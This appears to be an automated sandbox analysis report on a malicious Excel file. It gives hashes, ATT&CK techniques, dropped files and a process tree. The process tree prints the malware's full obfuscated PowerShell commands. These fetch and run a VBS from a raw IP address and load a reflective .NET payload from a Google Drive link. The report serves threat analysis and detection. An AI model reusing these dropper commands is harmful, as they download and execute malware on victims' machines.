c0e0842868faf1c6faa5caa5ae3db3064a1aea9814d3f22d67f3891c798ecd2b

Analysis

max time kernel
117s
max time network
121s
platform
windows7_x64
resource
win7-20240903-en
resource tags

arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system
submitted
26-10-2024 02:36

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

c0e0842868faf1c6faa5caa5ae3db3064a1aea9814d3f22d67f3891c798ecd2b.xls
Size

1.0MB
MD5

a8e1c0126304e8d65c0a30873dc3d830
SHA1

a0b52e51d227a126c1bc85b057482a58b028ed88
SHA256

c0e0842868faf1c6faa5caa5ae3db3064a1aea9814d3f22d67f3891c798ecd2b
SHA512

87ec45bd80a0b29c11900946b892134a636b6806ca87b9bce7fbbc52bfbd680436f73c61b6ce51a661b2b179cdf18577617267b68aab43a5f0f425e217f443cd
SSDEEP

12288:0mzHJEyfN1YpuBPP39sZEVD3DERnLRmF8DCO9auag9riz5+w3Z6VM0f3kobnY1lR:Hhfgp83hVbARM8+wa5ESZUF8nN

Score

10^/10

defense_evasion discovery execution

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

ps1.dropper

https://drive.google.com/uc?export=download&id=1AIVgJJJv1F6vS4sUOybnH-sDvUhBYwur

exe.dropper

https://drive.google.com/uc?export=download&id=1AIVgJJJv1F6vS4sUOybnH-sDvUhBYwur

Signatures

Blocklisted process makes network request 5 IoCs

flow	pid	Process
10	2268	mshta.exe
11	2268	mshta.exe
13	2356	pOweRSheLl.ExE
15	2608	powershell.exe
17	2608	powershell.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

Run Powershell and hide display window.

execution

PowerShell

T1059.001

pid	Process
2080	powershell.exe
2608	powershell.exe

Evasion via Device Credential Deployment 2 IoCs

defense_evasion execution

pid	Process
2356	pOweRSheLl.ExE
1508	powershell.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs

Web Service

T1102

flow	ioc
14	drive.google.com
15	drive.google.com

Drops file in System32 directory 4 IoCs

description	ioc	Process
File opened for modification	C:\Windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe
File opened for modification	C:\Windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe
File opened for modification	C:\Windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe
File opened for modification	C:\Windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	pOweRSheLl.ExE

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

System Location Discovery: System Language Discovery 1 TTPs 9 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	WScript.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	EXCEL.EXE
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	mshta.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	pOweRSheLl.ExE
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	csc.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cvtres.exe

Enumerates system info in registry 2 TTPs 1 IoCs

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\FloatingPointProcessor	EXCEL.EXE

Modifies Internet Explorer settings 1 TTPs 1 IoCs

adware spyware

Modify Registry

T1112

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000\Software\Microsoft\Internet Explorer\Main	mshta.exe

Suspicious behavior: AddClipboardFormatListener 1 IoCs

pid	Process
2580	EXCEL.EXE

Suspicious behavior: EnumeratesProcesses 6 IoCs

pid	Process
2356	pOweRSheLl.ExE
1508	powershell.exe
2356	pOweRSheLl.ExE
2356	pOweRSheLl.ExE
2080	powershell.exe
2608	powershell.exe

Suspicious use of AdjustPrivilegeToken 4 IoCs

description	pid	Process
Token: SeDebugPrivilege	2356	pOweRSheLl.ExE
Token: SeDebugPrivilege	1508	powershell.exe
Token: SeDebugPrivilege	2080	powershell.exe
Token: SeDebugPrivilege	2608	powershell.exe

Suspicious use of SetWindowsHookEx 5 IoCs

pid	Process
2580	EXCEL.EXE
2580	EXCEL.EXE
2580	EXCEL.EXE
2580	EXCEL.EXE
2580	EXCEL.EXE

Suspicious use of WriteProcessMemory 28 IoCs

description	pid	Process	procid_target
PID 2268 wrote to memory of 2356	2268	mshta.exe	32
PID 2268 wrote to memory of 2356	2268	mshta.exe	32
PID 2268 wrote to memory of 2356	2268	mshta.exe	32
PID 2268 wrote to memory of 2356	2268	mshta.exe	32
PID 2356 wrote to memory of 1508	2356	pOweRSheLl.ExE	34
PID 2356 wrote to memory of 1508	2356	pOweRSheLl.ExE	34
PID 2356 wrote to memory of 1508	2356	pOweRSheLl.ExE	34
PID 2356 wrote to memory of 1508	2356	pOweRSheLl.ExE	34
PID 2356 wrote to memory of 800	2356	pOweRSheLl.ExE	35
PID 2356 wrote to memory of 800	2356	pOweRSheLl.ExE	35
PID 2356 wrote to memory of 800	2356	pOweRSheLl.ExE	35
PID 2356 wrote to memory of 800	2356	pOweRSheLl.ExE	35
PID 800 wrote to memory of 1340	800	csc.exe	36
PID 800 wrote to memory of 1340	800	csc.exe	36
PID 800 wrote to memory of 1340	800	csc.exe	36
PID 800 wrote to memory of 1340	800	csc.exe	36
PID 2356 wrote to memory of 2964	2356	pOweRSheLl.ExE	39
PID 2356 wrote to memory of 2964	2356	pOweRSheLl.ExE	39
PID 2356 wrote to memory of 2964	2356	pOweRSheLl.ExE	39
PID 2356 wrote to memory of 2964	2356	pOweRSheLl.ExE	39
PID 2964 wrote to memory of 2080	2964	WScript.exe	40
PID 2964 wrote to memory of 2080	2964	WScript.exe	40
PID 2964 wrote to memory of 2080	2964	WScript.exe	40
PID 2964 wrote to memory of 2080	2964	WScript.exe	40
PID 2080 wrote to memory of 2608	2080	powershell.exe	42
PID 2080 wrote to memory of 2608	2080	powershell.exe	42
PID 2080 wrote to memory of 2608	2080	powershell.exe	42
PID 2080 wrote to memory of 2608	2080	powershell.exe	42

C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE
"C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE" /dde C:\Users\Admin\AppData\Local\Temp\c0e0842868faf1c6faa5caa5ae3db3064a1aea9814d3f22d67f3891c798ecd2b.xls
1⤵
- System Location Discovery: System Language Discovery
- Enumerates system info in registry
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
PID:2580

C:\Windows\SysWOW64\mshta.exe
C:\Windows\SysWOW64\mshta.exe -Embedding
1⤵
- Blocklisted process makes network request
- System Location Discovery: System Language Discovery
- Modifies Internet Explorer settings
- Suspicious use of WriteProcessMemory
PID:2268
- C:\Windows\SysWOW64\winDOWspOWERSheLL\v1.0\pOweRSheLl.ExE
  "C:\Windows\SysTEM32\winDOWspOWERSheLL\v1.0\pOweRSheLl.ExE" "poWERShELl -Ex bYPAss -NOP -w 1 -C DEVICECrEDENtiaLDEPloymenT.EXe ; IeX($(iEx('[syStem.TeXt.enCOdIng]'+[ChAr]58+[ChAr]0x3A+'utF8.geTStRiNg([SySTeM.cOnveRt]'+[CHar]0x3a+[ChAR]58+'FROMBASE64sTRINg('+[cHaR]34+'JExBTmYgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBhRGQtVFlwZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTWVtYmVyZEVmaU5pVElvTiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgiVXJsbU9OIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBidEdsVWpzLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBjRFNGWUcsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGVEYWNZeVRZWUNRLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQmtab0UsSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEFqUXRiYXVIcWJUKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYU1lICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJVYlRicGlLZSIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5BbWVTcEFjZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBEWlZyQVJNZFdhaCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRMQU5mOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTkyLjMuMTc2LjE0MS80MS9zaW1wbGV0aGluZ3N3aXRoZ3JlYXR0aGlnbnNnaXZlbm1lYmVzdHRoaW5ncy50SUYiLCIkRU52OkFQUERBVEFcc2ltcGxldGhpbmdzd2l0aGdyZWF0dGhpZ25zZ2l2ZW5tZWJlc3QudmJTIiwwLDApO1N0YVJ0LVNMZUVQKDMpO3N0YXJ0ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkZW52OkFQUERBVEFcc2ltcGxldGhpbmdzd2l0aGdyZWF0dGhpZ25zZ2l2ZW5tZWJlc3QudmJTIg=='+[Char]34+'))')))"
  2⤵
  - Blocklisted process makes network request
  - Evasion via Device Credential Deployment
  - Drops file in System32 directory
  - System Location Discovery: System Language Discovery
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:2356
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Ex bYPAss -NOP -w 1 -C DEVICECrEDENtiaLDEPloymenT.EXe
    3⤵
    - Evasion via Device Credential Deployment
    - Drops file in System32 directory
    - System Location Discovery: System Language Discovery
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:1508
- - C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe
    "C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\5y6g5r2p.cmdline"
    3⤵
    - System Location Discovery: System Language Discovery
    - Suspicious use of WriteProcessMemory
    PID:800
  - - C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe
      C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESC38E.tmp" "c:\Users\Admin\AppData\Local\Temp\CSCC38D.tmp"
      4⤵
      System Location Discovery: System Language Discovery
      PID:1340
- - C:\Windows\SysWOW64\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\simplethingswithgreatthignsgivenmebest.vbS"
    3⤵
    - System Location Discovery: System Language Discovery
    - Suspicious use of WriteProcessMemory
    PID:2964
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'JiggJHBTaG9tZVsyMV0rJFBzaE9tZVszMF0rJ3gnKSAoICgoJ3N3UmltYWdlVXJsID0gNWw3JysnaHR0cHM6Ly8nKydkcml2ZS5nb29nbGUuY29tL3VjP2V4cG9ydD1kb3dubG9hZCZpZD0xQUlWZ0pKSnYxRjZ2UzRzVU95Ym5ILXNEdlVoQll3dXIgNWw3O3N3UndlYkNsaWVudCA9IE5ldy1PYmplY3QgU3lzdGVtLk5ldC5XJysnZWJDbGllbnQ7c3dSaW1hZ2VCeXRlcyA9IHN3UndlYkNsaWVudC5Eb3dubG9hZERhdGEoc3dSaW1hZ2VVcmwpO3N3JysnUmltYWdlVGV4dCA9IFtTeXN0ZW0nKycuVGV4dC5FbmNvZGluZ10nKyc6OlVURjguR2V0U3RyaW5nKHN3UmltYWdlQnl0ZXMpO3N3UnN0YXJ0RmxhZyA9IDVsNzw8QkEnKydTRTY0X1NUQVJUPicrJz41bDc7c3dSZW5kRmxhZyA9IDVsNzw8QkFTRTY0X0VORD4+NWw3O3N3UnMnKyd0YXJ0SW5kZXggPSBzd1JpbWFnZVRleHQuSW5kZXhPZicrJyhzd1JzdGFydEZsYWcpO3N3UmVuZEluZGV4ID0gc3dSaW1hZ2VUJysnZXh0LkluZGV4T2Yoc3dSZW5kRmxhZyk7c3dSc3RhcnRJJysnbmRleCAtZ2UgMCAtYW5kIHMnKyd3UmVuZEluZGV4IC1ndCBzd1JzdGEnKydydEluZGV4O3N3UnN0YXJ0SW5kZXggKz0gc3dSc3RhcnRGbGFnLkxlbmd0aDtzd1JiYXNlNjRMZW5ndGggPSBzd1JlbmRJbmRleCAtIHN3UnN0YXJ0SW5kZXg7c3dSYmFzZTY0Q29tbWFuZCA9IHN3UmltYWdlVGV4dC5TdWJzJysndHJpbmcoc3dSc3RhcnRJbmRleCwgc3dSYmFzZTY0TGVuZ3RoKTtzd1JiYXNlNjRSZXZlcnNlZCA9IC1qbycrJ2luIChzd1JiYXNlNjRDb21tYW5kLlRvQ2hhckFycmF5KCcrJykgRncxJysnICcrJ0ZvckVhY2gtT2JqZWN0IHsgc3dSXyB9KVstMS4uLShzd1JiYXNlNjRDb21tYW5kLkxlbmd0aCldO3N3UmNvbW1hbmRCeXRlcyA9JysnIFtTeXN0ZW0uQ29udmVydF06OkZyb21CYXNlNjRTdHJpbmcoc3dSYmFzZTY0UmV2ZXJzZWQpO3N3UmxvYWRlZEFzc2VtYmx5ID0gW1N5c3RlbS5SZWZsZWN0aW9uLkFzc2VtYmx5XTo6TG9hZChzd1Jjb21tYW5kQnl0ZXMpO3N3UnZhaU1ldGhvZCA9IFtkJysnbmxpYicrJy5JTy5Ib21lXS5HZXRNZXRob2QoNWw3VkFJNWw3KTtzd1J2YWlNZXRob2QuSW52b2tlKHN3Um51bGwsIEAoNWw3dHh0LlRUUkxQTVMvMTQvMTQxLjY3MS4zLjI5MS8vOnB0dGg1bDcsIDVsN2Rlc2F0aXZhZG81bDcsIDVsN2Rlc2F0aXZhZG81bDcsIDVsN2Rlc2F0aXZhZG8nKyc1bDcsICcrJzVsN2FzcG5ldF9yZWdicm93c2VyczVsNywgNWw3ZCcrJ2VzYXRpdmFkbzVsNywgNWw3ZGVzYXRpdmFkbzVsNyw1bDdkZXNhdGl2YWRvNWw3LDVsN2Rlc2F0aXZhZG81bDcsNWw3ZGVzYXRpdmFkbzVsNyw1bDdkZXNhdGl2YWRvNWw3LDVsN2Rlc2F0aXZhZG81bDcsNWw3MTVsNyw1bDdkZXNhdGl2YWRvNWw3KSk7JykgLXJlUExhY0UnNWw3JyxbY0hhcl0zOSAtcmVQTGFjRSAnc3dSJyxbY0hhcl0zNiAgLUNSZXBMQWNlICAnRncxJyxbY0hhcl0xMjQpICk=';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
      4⤵
      Command and Scripting Interpreter: PowerShell
      Drops file in System32 directory
      System Location Discovery: System Language Discovery
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      Suspicious use of WriteProcessMemory
      PID:2080
    - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "&( $pShome[21]+$PshOme[30]+'x') ( (('swRimageUrl = 5l7'+'https://'+'drive.google.com/uc?export=download&id=1AIVgJJJv1F6vS4sUOybnH-sDvUhBYwur 5l7;swRwebClient = New-Object System.Net.W'+'ebClient;swRimageBytes = swRwebClient.DownloadData(swRimageUrl);sw'+'RimageText = [System'+'.Text.Encoding]'+'::UTF8.GetString(swRimageBytes);swRstartFlag = 5l7<<BA'+'SE64_START>'+'>5l7;swRendFlag = 5l7<<BASE64_END>>5l7;swRs'+'tartIndex = swRimageText.IndexOf'+'(swRstartFlag);swRendIndex = swRimageT'+'ext.IndexOf(swRendFlag);swRstartI'+'ndex -ge 0 -and s'+'wRendIndex -gt swRsta'+'rtIndex;swRstartIndex += swRstartFlag.Length;swRbase64Length = swRendIndex - swRstartIndex;swRbase64Command = swRimageText.Subs'+'tring(swRstartIndex, swRbase64Length);swRbase64Reversed = -jo'+'in (swRbase64Command.ToCharArray('+') Fw1'+' '+'ForEach-Object { swR_ })[-1..-(swRbase64Command.Length)];swRcommandBytes ='+' [System.Convert]::FromBase64String(swRbase64Reversed);swRloadedAssembly = [System.Reflection.Assembly]::Load(swRcommandBytes);swRvaiMethod = [d'+'nlib'+'.IO.Home].GetMethod(5l7VAI5l7);swRvaiMethod.Invoke(swRnull, @(5l7txt.TTRLPMS/14/141.671.3.291//:ptth5l7, 5l7desativado5l7, 5l7desativado5l7, 5l7desativado'+'5l7, '+'5l7aspnet_regbrowsers5l7, 5l7d'+'esativado5l7, 5l7desativado5l7,5l7desativado5l7,5l7desativado5l7,5l7desativado5l7,5l7desativado5l7,5l7desativado5l7,5l715l7,5l7desativado5l7));') -rePLacE'5l7',[cHar]39 -rePLacE 'swR',[cHar]36 -CRepLAce 'Fw1',[cHar]124) )"
        5⤵
        Blocklisted process makes network request
        Command and Scripting Interpreter: PowerShell
        Drops file in System32 directory
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:2608

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Persistence

Privilege Escalation

Defense Evasion

Modify Registry

T1112

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

Lateral Movement

Collection

Command and Control

Web Service

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\8B2B9A00839EED1DFDCCC3BFC2F5DF12

Filesize
1KB

MD5
67e486b2f148a3fca863728242b6273e

SHA1
452a84c183d7ea5b7c015b597e94af8eef66d44a

SHA256
facaf1c3a4bf232abce19a2d534e495b0d3adc7dbe3797d336249aa6f70adcfb

SHA512
d3a37da3bb10a9736dc03e8b2b49baceef5d73c026e2077b8ebc1b786f2c9b2f807e0aa13a5866cf3b3cafd2bc506242ef139c423eaffb050bbb87773e53881e

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\B46811C17859FFB409CF0E904A4AA8F8

Filesize
436B

MD5
971c514f84bba0785f80aa1c23edfd79

SHA1
732acea710a87530c6b08ecdf32a110d254a54c8

SHA256
f157ed17fcaf8837fa82f8b69973848c9b10a02636848f995698212a08f31895

SHA512
43dc1425d80e170c645a3e3bb56da8c3acd31bd637329e9e37094ac346ac85434df4edcdbefc05ae00aea33a80a88e2af695997a495611217fe6706075a63c58

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\8B2B9A00839EED1DFDCCC3BFC2F5DF12

Filesize
174B

MD5
230627819ac465d0e0b0da3c7dd0f04c

SHA1
caf679514ec7eb19d87cf88a1a7ff26dec094819

SHA256
699dcf3ad5d0e0ce013a205c6174a7aece3199bb8e3f7fc6ae03ad4e7e2e1c84

SHA512
5f2fbbd6d9bd5e0ca816d92f9eeb30ffbdd92b671f00f93009f84fb837d5a73d0d77212f89edb7131ceb5ff17037e2a5b290b603ceb579cc2fd67bfa2860bcdf

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\B46811C17859FFB409CF0E904A4AA8F8

Filesize
170B

MD5
d47b95f021157c99fada2d590c03f7e9

SHA1
cd086ca0986ce64815f1689139680084203b8396

SHA256
5ebbed17fb08219b1522e70fa610c66a62c8df2f051468e4546e4253b9eff4a9

SHA512
aa6afe82220b1cda8313767459134b8e333a7024994c643cba569b5e0a1c312efe9e0398125efa65f0db05f8083a9dc004ff44cbfbf86713630cb2ede80cb9ad

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\Y8UFEBH5\greatthingswithgoodnewsgivenbygodthingsgreat[1].hta

Filesize
8KB

MD5
7e03ce8476337538cce2cccba946dfd2

SHA1
3cd8b05d8be3e1d518069a6acd8e4dbbc857240e

SHA256
03f691a8f268670249f250d4ace8fa3e78fe7a79964ffbf601a2d74adde9f072

SHA512
3cf63555f7a4b620862458701d2272048517a7660ef95a8304a6ab43f452ecaa6c51cbd1b347e896c48edd2390015a7233160babc128bd129d944b69284f854e

Download Submit
C:\Users\Admin\AppData\Local\Temp\5y6g5r2p.dll

Filesize
3KB

MD5
1ea2d4b2dd14e219b823593a7abd0918

SHA1
af309f9d0c4885b0b69377d28207311f1c5f1075

SHA256
77d57f4ab6afe50c4ce4f034930302cf92fa8cfeca5582605a8c78819a88f7d7

SHA512
c0bb10c3b2fbf58142da3a30a28879a3364dda77d2bc640f9afcf83afad63396e2600a5fb60fc9cb6ec7efbb8338057f180f8d5c801e2d3c29bf4ec85b9e578b

Download Submit
C:\Users\Admin\AppData\Local\Temp\5y6g5r2p.pdb

Filesize
7KB

MD5
1acf15ecbba166a2c53804782d6cab98

SHA1
0b68d2f2887e2f9a45ce41667fc76bcdfc661ca5

SHA256
c8ba1dbb5fa05525c0a8a74f1d4999c93c103cced27556f84cf02b76bb2fc39e

SHA512
6ee32e7d8079e749b07d2293a11e7db558764d6619bd26e74b0f85ac537e251b8810ec5a8f88425db49ad3f2790b25828a83e2d62a9b20e97eb3757a265b8cf5

Download Submit
C:\Users\Admin\AppData\Local\Temp\CabBAA8.tmp

Filesize
70KB

MD5
49aebf8cbd62d92ac215b2923fb1b9f5

SHA1
1723be06719828dda65ad804298d0431f6aff976

SHA256
b33efcb95235b98b48508e019afa4b7655e80cf071defabd8b2123fc8b29307f

SHA512
bf86116b015fb56709516d686e168e7c9c68365136231cc51d0b6542ae95323a71d2c7acec84aad7dcecc2e410843f6d82a0a6d51b9acfc721a9c84fdd877b5b

Download Submit
C:\Users\Admin\AppData\Local\Temp\RESC38E.tmp

Filesize
1KB

MD5
d61382487b450e006c689bb318cecba3

SHA1
a85627cc3a463afcd23644303893c016880a1abb

SHA256
782619763a82219568e66a1dd6cbfcc86c53ec4a6bf2f716735ccf75b0548c75

SHA512
dbd69e9adc8db259466fd367f4320c2c861a6d3c28390b3dec49ebaa4e703e2c47719d32b6d7c97d24336ef47773a3543bae3b974fea7a0c2989dd6033c82cf2

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms

Filesize
7KB

MD5
75c7162a59743c9d4bb5859cc49716d2

SHA1
9fb9b95fb7226bbf50da33cf2a8774767e20daf4

SHA256
7525128b47620cafba925abeba307be213ff34defe2c7baa335d24b307ea8e1b

SHA512
2035326ef8245af2d015acf0cf704bab269c5f5b12ab82c5f0082399d8b67c3a21a74410aac0c08c29834481c3ace419a1a0e4ca1acaabc842f8bca49802d640

Download Submit
C:\Users\Admin\AppData\Roaming\simplethingswithgreatthignsgivenmebest.vbS

Filesize
136KB

MD5
74339d80989d10693dbc1115d1cf3eb4

SHA1
bd9b4dea8d68db3261e4eb23a9dfe857d0f9ee44

SHA256
a73c93345d81b888fe37255abc545dcdb3470b4f0bd59654e4b398c87be6b64d

SHA512
4befe3383549fb2048e9617430b284f8b62cce46fa4998a62122e7ed4349357ad9b11c0a0819c40467ce3b2ca7648222b1714e3745a4e74f50fae3d569caa1ba

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\5y6g5r2p.0.cs

Filesize
480B

MD5
ce22e90871744b25a04ac8c5691f49cc

SHA1
bc0a93c1fe61e00daa34774994b638d19f735228

SHA256
3b955e3c74519870aacef3876b7cdc4420f0b77d2d09937b7385e8b578f26546

SHA512
5f13af44f2219d050d04658808b287bcb9c948765a1aca148ab148e0981087ab22d6b5af9fa74360b41a7322b9009858cf25e480a579b16fc8bd62c9b72d0f88

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\5y6g5r2p.cmdline

Filesize
309B

MD5
30a963dd507d3c87659c49aa86f4eed9

SHA1
db61f802502fa7d3d25a7c3222d7f45378c66b11

SHA256
21a75cc623db9450920f82863d8c379fc0af526daa79b35e4f08805187212ecd

SHA512
82b36fc7c20547d8eecb0b29f9c71f5b62a36f8a14458a9d08ca48e814c54b745e529cf5f31db7023c84cfb0d4d246c1448607d540cbea388153804b58d75787

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\CSCC38D.tmp

Filesize
652B

MD5
54d62251d75868b706838b2a6a1e3517

SHA1
cdf4fbcba3599d0f5e3db4a1e318dfe60143e19e

SHA256
69e1275c72edaacc473e58899083e1d0641527c01c80531f07edb1197f38e40c

SHA512
caa17d21b431488e7d4704b6ab6e316ac4b726c5e32c649e76b6acfb69c6132941649aabf40b135716a8a69123893024a4422a781f6d0d1624fc5c5168695201

Download Submit
memory/2268-16-0x0000000002280000-0x0000000002282000-memory.dmp

Filesize
8KB

Download
memory/2580-1-0x0000000071E7D000-0x0000000071E88000-memory.dmp

Filesize
44KB

Download
memory/2580-60-0x0000000071E7D000-0x0000000071E88000-memory.dmp

Filesize
44KB

Download
memory/2580-0-0x000000005FFF0000-0x0000000060000000-memory.dmp

Filesize
64KB

Download
memory/2580-17-0x0000000002570000-0x0000000002572000-memory.dmp

Filesize
8KB

Download